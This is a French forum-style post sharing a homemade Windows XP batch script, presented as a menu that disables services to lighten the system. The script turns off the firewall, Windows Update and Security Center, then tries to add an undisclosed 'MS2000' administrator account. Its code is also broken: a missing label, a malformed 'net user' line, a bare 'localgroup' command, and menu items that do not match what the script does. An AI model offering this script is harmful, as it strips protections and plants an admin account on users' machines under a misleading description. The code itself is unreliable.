Comme prévu, je n ai pas l habitude de faire de longue phrase alors j ai tout simplement fait cette rubrique pour qui cherchent des script, fait a partir de mes éxécutables perso et maison.
Le premier est la création d un menu dans une fenetre DOS sous fond blanc et écriture noire, le seul but au final est d arréter certains services de windows XP afin d alléger le systeme et de le rendre compatible avec plusieurs applications
@echo off
color F0
@echo Ce script n'est pas une version officielle.
@echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
@echo.
@echo Ainsi vous etes responsable d une mauvaise utilisation.
@echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
@pause
@echo Warning / Attention:
@echo ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
@echo
@echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
@echo º º
@echo º WINDOWS XP ONLY º
@echo º Ce script va desactiver un certain nombre º
@echo º de services au demarage de windows XP º
@echo º º
@echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
@echo.
@pause
@echo 1-Installation Smi Server
@echo 2-Installation Site marster
@echo 3-Quitter
@choice /c:123 choisissez une option
if errorlevel 3 goto fin
if errorlevel 2 goto ms2000
if errorlevel 1 goto sql
:sql
net stop wscsvc
sc config wscsvc start= disabled
net stop helpsvc
sc config helpsvc start= disabled
net stop wzcsvc
sc config wzcsvc start= disabled
net stop wuauserv
sc config wuauserv start= disabled
net stop SharedAccess
sc config SharedAccess start= disabled
net stop Themes
sc config Themes start= disabled
net stop RemoteRegistry
sc config RemoteRegistry start= disabled
net stop LmHosts
sc config LmHosts start= disabled
net user MS2000 ADMI * /add
localgroup Administrateurs MS2000 /add
@echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
@echo º º
@echo º parametrage termine º
@echo º º
@echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
@pause
:fin
|